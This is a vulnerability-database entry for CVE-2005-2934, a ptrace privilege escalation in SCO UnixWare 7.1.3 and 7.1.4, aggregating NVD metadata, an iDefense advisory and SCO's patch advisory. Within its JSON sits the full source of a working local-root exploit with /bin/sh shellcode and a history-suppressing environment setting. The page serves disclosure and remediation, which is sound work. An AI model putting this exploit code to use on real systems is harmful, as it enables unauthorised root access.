Search...

CVE-2005-2934

2005-12-31T05:00:00

ID CVE-2005-2934
Type cve
Reporter cve@mitre.org
Modified 2017-07-11T01:33:00

Description

Unspecified vulnerability in ptrace in SCO UnixWare 7.1.3 and 7.1.4 allows local users to gain privileges via unspecified vectors.

JSON Vulners Source

Initial Source

{"id": "CVE-2005-2934", "bulletinFamily": "NVD", "title": "CVE-2005-2934", "description": "Unspecified vulnerability in ptrace in SCO UnixWare 7.1.3 and 7.1.4 allows local users to gain privileges via unspecified vectors.", "published": "2005-12-31T05:00:00", "modified": "2017-07-11T01:33:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2005-2934", "reporter": "cve@mitre.org", "references": ["http://secunia.com/advisories/18958", "http://www.securityfocus.com/bid/16765", "http://securitytracker.com/id?1015676", "https://exchange.xforce.ibmcloud.com/vulnerabilities/24856", "http://www.idefense.com/application/poi/display?type=vulnerabilities", "ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9/SCOSA-2006.9.txt"], "cvelist": ["CVE-2005-2934"], "type": "cve", "lastseen": "2021-02-02T05:24:38", "edition": 4, "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "osvdb", "idList": ["OSVDB:23390"]}, {"type": "exploitdb", "idList": ["EDB-ID:1534"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:11552", "SECURITYVULNS:DOC:11585"]}], "modified": "2021-02-02T05:24:38", "rev": 2}, "score": {"value": 6.9, "vector": "NONE", "modified": "2021-02-02T05:24:38", "rev": 2}, "vulnersScore": 6.9}, "cpe": ["cpe:/o:sco:unixware:7.1.4", "cpe:/o:sco:unixware:7.1.3"], "affectedSoftware": [{"cpeName": "sco:unixware", "name": "sco unixware", "operator": "eq", "version": "7.1.3"}, {"cpeName": "sco:unixware", "name": "sco unixware", "operator": "eq", "version": "7.1.4"}], "cvss2": {"cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": true, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {}, "cpe23": ["cpe:2.3:o:sco:unixware:7.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:sco:unixware:7.1.4:*:*:*:*:*:*:*"], "cwe": ["NVD-CWE-Other"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:sco:unixware:7.1.3:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:sco:unixware:7.1.4:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}, "extraReferences": [{"name": "1015676", "refsource": "SECTRACK", "tags": [], "url": "http://securitytracker.com/id?1015676"}, {"name": "20060224 SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability", "refsource": "IDEFENSE", "tags": [], "url": "http://www.idefense.com/application/poi/display?type=vulnerabilities"}, {"name": "unixware-ptrace-privilege-elevation(24856)", "refsource": "XF", "tags": [], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/24856"}, {"name": "16765", "refsource": "BID", "tags": [], "url": "http://www.securityfocus.com/bid/16765"}, {"name": "18958", "refsource": "SECUNIA", "tags": ["Patch", "Vendor Advisory"], "url": "http://secunia.com/advisories/18958"}, {"name": "SCOSA-2006.9", "refsource": "SCO", "tags": ["Patch", "Vendor Advisory"], "url": "ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9/SCOSA-2006.9.txt"}]}

{"osvdb": [{"lastseen": "2017-04-28T13:20:20", "bulletinFamily": "software", "cvelist": ["CVE-2005-2934"], "edition": 1, "description": "# No description provided by the source\n\n## References:\nSecurity Tracker: 1015676\n[Secunia Advisory ID:18958](https://secuniaresearch.flexerasoftware.com/advisories/18958/)\nOther Advisory URL: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=395\nOther Advisory URL: ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9/SCOSA-2006.9.txt\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0622.html\nMail List Post: http://archives.neohapsis.com/archives/fulldisclosure/2006-02/0629.html\nGeneric Exploit URL: http://prdelka.blackart.org.uk/exploitz/prdelka-vs-SCO-ptrace.c\n[CVE-2005-2934](https://vulners.com/cve/CVE-2005-2934)\n", "modified": "2006-02-22T04:49:56", "published": "2006-02-22T04:49:56", "href": "https://vulners.com/osvdb/OSVDB:23390", "id": "OSVDB:23390", "title": "UnixWare ptrace() Function Local Privilege Escalation", "type": "osvdb", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T14:23:13", "description": "SCO Unixware 7.1.3 (ptrace) Local Privilege Escalation Exploit. CVE-2005-2934. Local exploit for sco platform", "published": "2006-02-26T00:00:00", "type": "exploitdb", "title": "SCO Unixware 7.1.3 - ptrace Local Privilege Escalation Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2005-2934"], "modified": "2006-02-26T00:00:00", "id": "EDB-ID:1534", "href": "https://www.exploit-db.com/exploits/1534/", "sourceData": "/* SCO Unixware 7.1.3 ptrace local root exploit\n * ============================================\n * SCO Unixware 7.1.3 kernel allows unprivledged users\n * to debug binaries. The condition can be exploited\n * by an attacker when he has execute permissions to \n * a file which has the suid bit set.\n * \n * Example.\n *\n * $ uname -a\n * UnixWare iron 5 7.1.3 i386 x86at SCO UNIX_SVR5\n * $ /linux/bin/bash\n * bash-2.05$ uname -a\n * Linux iron.fi.st 2.4.13 #1 Thu Oct 31 02:32:23 EST 2002 i686 unknown\n * bash-2.05$ id\n * uid=122(matt) gid=1(other) groups=1(other)\n * bash-2.05$ ./fu /unixware/usr/lib/sendmail\n * [ SCO Unixware 7.1.3 ptrace local root exploit\n * [ Using 0xbfffed78\n * sh-2.05# id\n * uid=0(root) gid=1(other) groups=1(other)\n * sh-2.05# \n * \n * - prdelka\n */\n#include <stdio.h>\n#include <stdlib.h>\n#include <signal.h>\n#include <syscall.h>\n#include <sys/ptrace.h>\n#include <sys/types.h>\n#include <sys/wait.h>\n#include <unistd.h>\n#include <errno.h>\n#include <asm/user.h>\n\n\n\nchar shellcode[]=\"\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\"\n\t\t \"\\x90\\x31\\xdb\\x8d\\x43\\x17\\xcd\\x80\\x31\\xc0\"\n\t\t \"\\x50\\x68\"\"//sh\"\"\\x68\"\"/bin\"\"\\x89\\xe3\\x50\"\n\t\t \"\\x53\\x89\\xe1\\x99\\xb0\\x0b\\xcd\\x80\";\n\n\nint main(int argc,char* argv[])\n{\n\tint esp, eip, i = 0;\n\tstruct user_regs_struct regs;\n\tchar *env[] = {\"HISTFILE=/dev/null\",NULL};\n\tpid_t pid;\n\tprintf(\"[ SCO Unixware 7.1.3 local root exploit\\n\");\n\tif(argc < 2)\n\t{\n\t\tprintf(\"[ Usage: [binary]\\n\");\n\t\tprintf(\"[ e.g -rwsr-sr-x root root /linux/opt/kde2/bin/kcheckpass\\n\");\n\t\texit(0);\n\t}\n\tswitch (pid = fork())\n\t{\n\tcase -1:\n\t\tperror(\"fork\");\n\t\tbreak;\n\tcase 0:\t\t\n\t\tptrace(PTRACE_TRACEME, 0, 0, 0);\t\t\n\t\tpid = getpid();\n\t\texecle(argv[1],argv[1],NULL,env);\t\t\n\t\tbreak;\n\tdefault:\t\t\n\t\twaitpid(pid, NULL, 0);\t\n\t\tptrace(PTRACE_GETREGS, pid, NULL, &regs);\n\t\tesp = eip = regs.esp - 512;\n\t\twhile (i < strlen(shellcode)) \n\t\t{\n\t\t\tptrace(PTRACE_POKETEXT, pid, esp, (int) *(int *) (shellcode + i));\n\t\t\ti += 4;\n\t\t\tesp += 4;\n\t\t}\n\t\tregs.eip = (long) eip;\n\t\tprintf(\"[ Using 0x%x\\n\",regs.eip);\t\n\t\tptrace(PTRACE_SETREGS, pid, NULL, &regs);\n\t\tptrace(PTRACE_DETACH, pid, NULL,NULL);\n\t}\n\tusleep(1);\n\twait(0);\n\treturn 0;\n}\n\n// milw0rm.com [2006-02-26]\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/1534/"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-2934"], "description": "SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability\r\n\r\niDefense Security Advisory 02.24.06\r\nhttp://www.idefense.com/intelligence/vulnerabilities/display.php?id=395\r\nFebruary 24, 2006\r\n\r\nI. BACKGROUND\r\n\r\nSCO Unixware is a Unix operating system that runs on many OEM platforms.\r\n\r\nMore information about the product is available from:\r\n\r\n http://www.caldera.com/products/unixware714/\r\n\r\nII. DESCRIPTION\r\n\r\nLocal exploitation of an access validation error in SCO Unixware allows\r\nattackers to gain root privileges.\r\n\r\nThe vulnerability specifically exists due to a failure to check\r\npermissions on traced executables. The ptrace() system call provides an\r\ninterface for debugging other processes on the system. SCO Unixware's\r\nimplementation of the ptrace system call fails to check for setuid\r\npermissions on binaries before attaching to the process. This results\r\nin the complete control of memory and execution for the traced process\r\nwith root privileges. Attackers can inject data into the running setuid\r\nprocess and execute arbitrary code with root permissions.\r\n\r\nIII. ANALYSIS\r\n\r\nExploitation of this vulnerability is trivial. Simply placing shellcode\r\nin the environment and changing the instruction pointer via ptrace() is\r\nenough to elevate privileges.\r\n \r\nIV. DETECTION\r\n\r\niDefense has confirmed the existence of this vulnerability in SCO\r\nUnixware versions 7.1.3 and 7.1.4. All previous versions of SCO Unixware\r\nare suspected to be vulnerable.\r\n\r\nV. WORKAROUND\r\n\r\nIt is not possible to reduce the impact of this vulnerability other\r\nthan to restrict access to the affected systems.\r\n\r\nVI. VENDOR RESPONSE\r\n\r\nThe vendor has released the following advisory to address this issue:\r\n\r\n ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9/SCOSA-2006.9.txt\r\n\r\nVII. CVE INFORMATION\r\n\r\nThe Common Vulnerabilities and Exposures (CVE) project has assigned the\r\nname CAN-2005-2934 to this issue. This is a candidate for inclusion in\r\nthe CVE list (http://cve.mitre.org), which standardizes names for\r\nsecurity problems.\r\n\r\nVIII. DISCLOSURE TIMELINE\r\n\r\n09/15/2005 Initial vendor notification\r\n10/13/2005 Initial vendor response\r\n02/24/2006 Public disclosure\r\n\r\nIX. CREDIT\r\n\r\nThe discoverer of this vulnerability wishes to remain anonymous.\r\n\r\nGet paid for vulnerability research\r\nhttp://www.iDefense.com/poi/teams/vcp.jsp\r\n\r\nFree tools, research and upcoming events\r\nhttp://labs.iDefense.com\r\n\r\nX. LEGAL NOTICES\r\n\r\nCopyright \u00a9 2006 iDefense, Inc.\r\n\r\nPermission is granted for the redistribution of this alert\r\nelectronically. It may not be edited in any way without the express\r\nwritten consent of iDefense. If you wish to reprint the whole or any\r\npart of this alert in any other medium other than electronically, please\r\nemail customerservice@iDefense.com for permission.\r\n\r\nDisclaimer: The information in the advisory is believed to be accurate\r\nat the time of publishing based on currently available information. Use\r\nof the information constitutes acceptance for use in an AS IS condition.\r\nThere are no warranties with regard to this information. Neither the\r\nauthor nor the publisher accepts any liability for any direct, indirect,\r\nor consequential loss or damage arising from use of, or reliance on,\r\nthis information.\r\n", "edition": 1, "modified": "2006-02-25T00:00:00", "published": "2006-02-25T00:00:00", "id": "SECURITYVULNS:DOC:11585", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11585", "title": "iDefense Security Advisory 02.24.06: SCO Unixware Setuid ptrace Local Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:16", "bulletinFamily": "software", "cvelist": ["CVE-2005-2934"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n______________________________________________________________________________\r\n\r\n SCO Security Advisory\r\n\r\nSubject: UnixWare 7.1.3 UnixWare 7.1.4 : Setuid ptrace Local Privilege\r\nEscalation Vulnerability\r\nAdvisory number: SCOSA-2006.9\r\nIssue date: 2006 February 21\r\nCross reference: fz533176\r\n CVE-2005-2934\r\n______________________________________________________________________________\r\n\r\n\r\n1. Problem Description\r\n\r\n A local user can exploit the ptrace() system call to gain\r\n root privileges.\r\n \r\n The Common Vulnerabilities and Exposures project\r\n (cve.mitre.org) has assigned the name CVE-2005-2934 to\r\n this issue.\r\n\r\n\r\n2. Vulnerable Supported Versions\r\n\r\n System Binaries\r\n ----------------------------------------------------------------------\r\n UnixWare 7.1.3 /etc/conf/pack.d/sum/Driver_atup.o /etc/conf/pack.d/sum/Driver_mp.o\r\n UnixWare 7.1.4 /etc/conf/pack.d/sum/Driver_atup.o /etc/conf/pack.d/sum/Driver_mp.o\r\n\r\n\r\n\r\n3. Solution\r\n\r\n The proper solution is to install the latest packages.\r\n\r\n\r\n4. UnixWare 7.1.3\r\n\r\n 4.1 Location of Fixed Binaries\r\n\r\n ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9\r\n\r\n\r\n 4.2 Verification\r\n\r\n a31512eee4940c6ba048a1b1878ac4fc p533176.713.image\r\n\r\n md5 is available for download from\r\n ftp://ftp.sco.com/pub/security/tools\r\n\r\n\r\n 4.3 Installing Fixed Binaries\r\n\r\n Upgrade the affected binaries with the following sequence:\r\n\r\n Download p533176.713.image to the /var/spool/pkg directory\r\n\r\n # pkgadd -d /var/spool/pkg/p533176.713.image\r\n\r\n\r\n5. UnixWare 7.1.4\r\n\r\n 5.1 Location of Fixed Binaries\r\n\r\n ftp://ftp.sco.com/pub/updates/UnixWare/SCOSA-2006.9\r\n\r\n\r\n 5.2 Verification\r\n\r\n 1b8fa986357036a8be043b642cc47e56 p533176.714.image\r\n\r\n md5 is available for download from\r\n ftp://ftp.sco.com/pub/security/tools\r\n\r\n\r\n 5.3 Installing Fixed Binaries\r\n\r\n Upgrade the affected binaries with the following sequence:\r\n\r\n Download p533176.714.image to the /var/spool/pkg directory\r\n\r\n # pkgadd -d /var/spool/pkg/p533176.714.image\r\n\r\n\r\n6. References\r\n\r\n Specific references for this advisory:\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2934\r\n\r\n SCO security resources:\r\n http://www.sco.com/support/security/index.html\r\n\r\n SCO security advisories via email\r\n http://www.sco.com/support/forums/security.html\r\n\r\n This security fix closes SCO incidents fz533176.\r\n\r\n\r\n7. Disclaimer\r\n\r\n SCO is not responsible for the misuse of any of the information\r\n we provide on this website and/or through our security\r\n advisories. Our advisories are a service to our customers intended\r\n to promote secure installation and use of SCO products.\r\n\r\n\r\n8. Acknowledgments\r\n\r\n SCO would like to thank iDEFENSE for reporting this vulnerability.\r\n\r\n______________________________________________________________________________\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.0 (UnixWare)\r\n\r\niD8DBQFD+8opaqoBO7ipriERAjDDAJsGF+jQxvdXGodCYyOizM4zWX6kBwCdFlWc\r\n+wSF78NCwxKxa9xx7cU3KMg=\r\n=YZgG\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2006-02-22T00:00:00", "published": "2006-02-22T00:00:00", "id": "SECURITYVULNS:DOC:11552", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:11552", "title": "[Full-disclosure] SCOSA-2006.9 UnixWare 7.1.3 UnixWare 7.1.4 : Setuid ptrace Local Privilege Escalation Vulnerability", "type": "securityvulns", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}